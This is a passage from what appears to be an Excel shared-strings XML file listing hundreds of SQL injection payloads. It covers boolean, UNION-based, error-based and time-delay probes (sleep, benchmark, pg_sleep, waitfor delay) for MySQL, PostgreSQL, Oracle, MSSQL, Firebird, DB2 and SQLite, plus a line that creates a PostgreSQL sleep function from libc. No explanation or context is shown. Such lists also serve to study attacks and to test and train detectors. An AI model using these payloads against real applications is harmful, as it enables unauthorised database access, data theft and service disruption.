    <t>1 )  where 8671 = 8671 and make_set ( 4931 = 1642,1642 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'bmyt' from dual where 9407 = 9407 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   ) ||'</t>
  </si>
  <si>
    <t>1'+ ( select iaeu where 5509 = 5509 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>1' )  where 3730 = 3730 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1'+ ( select goec where 9460 = 9460 rlike  ( select  ( case when  ( 4740 = 1203 )  then 1 else 0x28 end  )  )   ) +'</t>
  </si>
  <si>
    <t>-7675%'  )  )   )  order by 1--</t>
  </si>
  <si>
    <t>-4711%"  )  )   union all select 6737,6737,6737,6737#</t>
  </si>
  <si>
    <t>1"  )  )   and 7533 = 7533 and   (  (  "gkca" = "gkca</t>
  </si>
  <si>
    <t>1 )  and 7533 = 7533 and  ( 7175 = 7175</t>
  </si>
  <si>
    <t>1'  )  )   )  and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1" union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1" )  as kslq where 8669 = 8669 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1%"  )  )   or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1"  )  )   as yosd where 1255 = 1255</t>
  </si>
  <si>
    <t>1'  )  )   )  union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1  )  )   order by 1#</t>
  </si>
  <si>
    <t>-9356 or elt ( 1032 = 1032,3623 ) -- izgi</t>
  </si>
  <si>
    <t>1%" )  union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>1%" and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and "%" = "</t>
  </si>
  <si>
    <t>1'|| ( select 'drna' from dual where 5082 = 5082 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   ) ||'</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 7823 = 7823 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )  </t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and   (  (   ( "zlal" = "zlal</t>
  </si>
  <si>
    <t>1'|| ( select 'lxyu' from dual where 5789 = 5789 union all select null#</t>
  </si>
  <si>
    <t>1"  )  )   or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  "qgle" like "qgle</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1%' )  union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">1' or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) </t>
  </si>
  <si>
    <t xml:space="preserve">-3436 )  or elt ( 1032 = 1032,3623 ) </t>
  </si>
  <si>
    <t>1%" or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and "%" = "</t>
  </si>
  <si>
    <t>1" where 1115 = 1115 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1"  )  )   and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1' )  where 6440 = 6440 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1'+ ( select pwvr where 3028 = 3028 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">-2039' )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 </t>
  </si>
  <si>
    <t>-2365  )  )   union all select 8190,8190#</t>
  </si>
  <si>
    <t>-3868'  )  )   or make_set ( 6809 = 1236,1236 )  and   (  (  'evnj' = 'evnj</t>
  </si>
  <si>
    <t>1  )  )   )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1" )  where 5938 = 5938 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1 )  as zbha where 9700 = 9700 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1' )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and  ( 'vkde' = 'vkde</t>
  </si>
  <si>
    <t>1'|| ( select 'iwlj' where 8704 = 8704 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a  )  )  ||'</t>
  </si>
  <si>
    <t>-2626%' )  or elt ( 7513 = 8586,8586 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1 where 7055 = 7055</t>
  </si>
  <si>
    <t>-5516'+ ( select 'bmlv' where 7188 = 7188 union all select 7188,7188,7188,7188,7188,7188,7188,7188#</t>
  </si>
  <si>
    <t xml:space="preserve">1" or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) </t>
  </si>
  <si>
    <t>-7963'+ ( select 'kxzh' where 7039 = 7039 union all select 7039,7039,7039,7039,7039,7039--</t>
  </si>
  <si>
    <t>1'  )  )   )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and "plqe" = "plqe</t>
  </si>
  <si>
    <t>1' )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( 'cuat' = 'cuat</t>
  </si>
  <si>
    <t>1'+ ( select 'qxmo' where 9511 = 9511 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>-3880 )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 11</t>
  </si>
  <si>
    <t>1" )  and make_set ( 8403 = 8403,8899 )  and  ( "dhss" = "dhss</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and   (  (  '%' = '</t>
  </si>
  <si>
    <t>-5513"  )  )   )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 1</t>
  </si>
  <si>
    <t>-3226'|| ( select 'ykdw' where 2617 = 2617 union all select 2617,2617--</t>
  </si>
  <si>
    <t>1'  )  )   and make_set ( 3793 = 8118,8118 )  and   (  (  'swvc' like 'swvc</t>
  </si>
  <si>
    <t>-8661" union all select 5731,5731--</t>
  </si>
  <si>
    <t>1"  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1"  )  )   and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  "ksrh" = "ksrh</t>
  </si>
  <si>
    <t>1'  )  )   as cbka where 3176 = 3176 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null,null,null--</t>
  </si>
  <si>
    <t>-1162"  )  )   as mhmh where 8710 = 8710 or make_set ( 4822 = 7598,7598 ) --</t>
  </si>
  <si>
    <t>1'+ ( select sijr where 7250 = 7250</t>
  </si>
  <si>
    <t>1" )  where 7548 = 7548</t>
  </si>
  <si>
    <t>select  ( case when  ( 1726 = 4080 )  then 1726 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1%"  )  )   or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1"  )  )   as vhrq where 1690 = 1690 and elt ( 1210 = 1210,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 5519 = 4796,1,1/0 ) </t>
  </si>
  <si>
    <t>1%'  )  )   )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1" and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and "ssfu" = "ssfu</t>
  </si>
  <si>
    <t>1"  )  )   )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( "buwe" = "buwe</t>
  </si>
  <si>
    <t>1' )  union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1  )  )   as xroy where 3274 = 3274</t>
  </si>
  <si>
    <t>-5062"  )  )   )  union all select 4125,4125--</t>
  </si>
  <si>
    <t>1  )  )   as qzmg where 4344 = 4344 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) --</t>
  </si>
  <si>
    <t>1" where 1809 = 1809 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>-7656"  )  )   )  union all select 3172,3172,3172,3172,3172,3172,3172,3172,3172,3172--</t>
  </si>
  <si>
    <t>1%" union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>select  ( case when  ( 1082 = 6755 )  then 1082 else 1082* ( select 1082 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1'+ ( select 'jkgf' where 7487 = 7487</t>
  </si>
  <si>
    <t>-5425 where 5933 = 5933 union all select 5933,5933,5933--</t>
  </si>
  <si>
    <t>-1816" )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122</t>
  </si>
  <si>
    <t>1 where 1186 = 1186 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and  ( 'seyd' = 'seyd</t>
  </si>
  <si>
    <t>select * from generate_series ( 2673,2673,case when  ( 2673 = 1468 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1"  )  )   as nbdc where 4444 = 4444 union all select null,null--</t>
  </si>
  <si>
    <t>1' )  where 3767 = 3767 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>1' )  as dpmh where 5281 = 5281 and 2006 = 2006</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 3888 = 3888 )  then  ( select count ( * )  from generate_series ( 1,5000000  )  )   else 1/ ( select 0 )  end  )  )  </t>
  </si>
  <si>
    <t>-4558" or  ( 3965 = 3933 ) *3933 and "hmdb" like "hmdb</t>
  </si>
  <si>
    <t xml:space="preserve"> end and  ( 'jzlr' = 'jzlr</t>
  </si>
  <si>
    <t>1'|| ( select 'svnn' from dual where 8710 = 8710</t>
  </si>
  <si>
    <t>1'  )  )   and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  'bgdp' = 'bgdp</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  </t>
  </si>
  <si>
    <t>-1543%' union all select 9341,9341,9341,9341,9341,9341,9341,9341,9341--</t>
  </si>
  <si>
    <t>-2798'+ ( select 'emui' where 9565 = 9565 union all select 9565,9565,9565,9565--</t>
  </si>
  <si>
    <t>-8080'  )  )   order by 1#</t>
  </si>
  <si>
    <t>1' )  where 7478 = 7478</t>
  </si>
  <si>
    <t>1" where 1618 = 1618 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>-3520%' or 8571 = 8571--</t>
  </si>
  <si>
    <t>-2909'|| ( select 'qfeq' where 7062 = 7062 union all select 7062,7062,7062,7062,7062,7062--</t>
  </si>
  <si>
    <t>-8094 )  or elt ( 1032 = 1032,3623 )  and  ( 4569 = 4569</t>
  </si>
  <si>
    <t>-2784'  )  )   union all select 6775,6775,6775,6775,6775,6775,6775,6775,6775#</t>
  </si>
  <si>
    <t>1'  )  )   )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( 'ogwd' like 'ogwd</t>
  </si>
  <si>
    <t xml:space="preserve">-2129' )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 </t>
  </si>
  <si>
    <t>1"  )  )   )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( "djrh" = "djrh</t>
  </si>
  <si>
    <t>1"  )  )   or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (  "zlwb" = "zlwb</t>
  </si>
  <si>
    <t>1' )  where 5799 = 5799 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' where 6406 = 6406</t>
  </si>
  <si>
    <t xml:space="preserve">-4033'  )  )   or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char </t>
  </si>
  <si>
    <t>-4389'  )  )   )  or  ( 1139 = 3499 ) *3499 and   (  (   ( 'qoch' = 'qoch</t>
  </si>
  <si>
    <t>-8487' )  where 9655 = 9655 union all select 9655,9655,9655,9655,9655,9655,9655,9655,9655,9655--</t>
  </si>
  <si>
    <t>1'|| ( select 'bccx' where 5881 = 5881 and elt ( 1210 = 1210,sleep ( 5  )  )   ) ||'</t>
  </si>
  <si>
    <t>1" )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1" )  as xaye where 5343 = 5343 and 4355 = 7475#</t>
  </si>
  <si>
    <t>1' )  where 8086 = 8086 and 1430 = 7941--</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and "rugr" = "rugr</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null#</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and make_set ( 6488 = 5525,5525 ) </t>
  </si>
  <si>
    <t xml:space="preserve">-4923" or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   </t>
  </si>
  <si>
    <t>-1988 where 4597 = 4597 union all select 4597,4597,4597,4597,4597,4597--</t>
  </si>
  <si>
    <t>1' in boolean mode )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) #</t>
  </si>
  <si>
    <t>1' )  union all select null,null,null--</t>
  </si>
  <si>
    <t>1%" rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and "%" = "</t>
  </si>
  <si>
    <t>1' in boolean mode )  and elt ( 9630 = 4765,4765 ) #</t>
  </si>
  <si>
    <t xml:space="preserve">-1254" or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 </t>
  </si>
  <si>
    <t>-8999'  )  )   )  or 6872 = 6872 and   (  (   ( 'jare' = 'jare</t>
  </si>
  <si>
    <t>1" )  as ifgl where 2190 = 2190 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>1 )  where 2307 = 2307</t>
  </si>
  <si>
    <t>1 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) -- xsob</t>
  </si>
  <si>
    <t>1'|| ( select 'eils' where 8308 = 8308 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>1' )  or sleep ( 5 )  and  ( 'kgbm' = 'kgbm</t>
  </si>
  <si>
    <t>1"  )  )   and elt ( 4249 = 4249,7259 )  and   (  (  "abcm" like "abcm</t>
  </si>
  <si>
    <t>-4032' )  where 5157 = 5157 or 1809 = 2810#</t>
  </si>
  <si>
    <t>1'|| ( select 'ghby' from dual where 4854 = 4854</t>
  </si>
  <si>
    <t>1 )  where 9213 = 9213 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-9928"  )  )   union all select 7511,7511,7511,7511,7511,7511,7511,7511#</t>
  </si>
  <si>
    <t>-7743" or 9323 = 9323#</t>
  </si>
  <si>
    <t>1' )  and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>-1354  )  )   or 8571 = 8571--</t>
  </si>
  <si>
    <t>1%' )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  'uadr' like 'uadr</t>
  </si>
  <si>
    <t>-2364'+ ( select 'qdut' where 7560 = 7560 union all select 7560,7560,7560,7560,7560--</t>
  </si>
  <si>
    <t>1"  )  )   )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (   ( "text" like "text</t>
  </si>
  <si>
    <t>1%"  )  )   and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-2456'  )  )   )  or  ( 8459 = 8459 ) *4906 and   (  (   ( 'bbkp' = 'bbkp</t>
  </si>
  <si>
    <t>select  ( case when  ( 6287 = 8341 )  then 6287 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>-7565%' )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113</t>
  </si>
  <si>
    <t>create or replace function sleep ( int )  returns int as '/lib/libc.so.6','sleep' language 'c' strict</t>
  </si>
  <si>
    <t>-3867%' )  or 3084 = 5633 and  ( '%' = '</t>
  </si>
  <si>
    <t>1  )  )   union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' )  where 8252 = 8252 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>1%' )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>-8463  )  )   )  or 4861 = 9834#</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and make_set ( 8403 = 8403,8899 ) </t>
  </si>
  <si>
    <t>-4869%' union all select 5729,5729,5729--</t>
  </si>
  <si>
    <t>1%' procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and '%' = '</t>
  </si>
  <si>
    <t>1%' )  and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1%" and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1%' union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5# pdyo</t>
  </si>
  <si>
    <t>1 where 9393 = 9393 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1'  )  )   or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (  'qiau' = 'qiau</t>
  </si>
  <si>
    <t>1  )  )   as midl where 9046 = 9046 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and  ( "%" = "</t>
  </si>
  <si>
    <t>1"  )  )   and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (  "bfko" = "bfko</t>
  </si>
  <si>
    <t>1 where 9083 = 9083 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>-9660  )  )   or 9762 = 9698</t>
  </si>
  <si>
    <t>-9445 )  as dmur where 4371 = 4371 union all select 4371,4371,4371,4371,4371,4371,4371,4371,4371,4371#</t>
  </si>
  <si>
    <t>1'|| ( select 'dpce' from dual where 5261 = 5261 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'+ ( select 'zkum' where 5161 = 5161 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (   ( 'pshn' like 'pshn</t>
  </si>
  <si>
    <t xml:space="preserve">1',iif ( 4861 = 6268,1,1/0 ) </t>
  </si>
  <si>
    <t>1'+ ( select tafk where 9652 = 9652</t>
  </si>
  <si>
    <t>1' where 9206 = 9206</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 1421 = 1421 )  then 1 else 1421* ( select 1421 from master..sysdatabases )  end  )  )  </t>
  </si>
  <si>
    <t>1%'  )  )   union all select null,null--</t>
  </si>
  <si>
    <t>-6020'+ ( select isrz where 2489 = 2489 union all select 2489,2489,2489,2489,2489,2489,2489,2489--</t>
  </si>
  <si>
    <t>1 where 2031 = 2031 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-6870" )  as deox where 8198 = 8198 union all select 8198#</t>
  </si>
  <si>
    <t>1'+ ( select bfeq where 3445 = 3445 and 9198 = 9198--</t>
  </si>
  <si>
    <t>1%" )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   as yefv where 4263 = 4263</t>
  </si>
  <si>
    <t>-6965' )  union all select 2857,2857,2857,2857,2857,2857,2857,2857,2857,2857--</t>
  </si>
  <si>
    <t>1"  )  )   as dooq where 7911 = 7911</t>
  </si>
  <si>
    <t>-8205' or elt ( 6581 = 3480,3480 )  and 'sosv' = 'sosv</t>
  </si>
  <si>
    <t>1'  )  )   as eleh where 1347 = 1347 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>-5160' )  union all select 8067,8067,8067,8067,8067,8067,8067--</t>
  </si>
  <si>
    <t>1' and sleep ( 5 )  and 'pfgy' = 'pfgy</t>
  </si>
  <si>
    <t>1' )  as yqld where 2489 = 2489</t>
  </si>
  <si>
    <t>-5231%" or 4945 = 8402#</t>
  </si>
  <si>
    <t>1  )  )   or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  6829 = 6829</t>
  </si>
  <si>
    <t>-3297' or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) |</t>
  </si>
  <si>
    <t>1' where 2025 = 2025 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1' )  as gxfu where 9676 = 9676</t>
  </si>
  <si>
    <t>1 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) # jcdh</t>
  </si>
  <si>
    <t>1'+ ( select vvet where 5221 = 5221 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   ) +'</t>
  </si>
  <si>
    <t>1'|| ( select 'pnsw' where 2103 = 2103 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1" where 6686 = 6686 or elt ( 6272 = 6272,sleep ( 5  )  )  --</t>
  </si>
  <si>
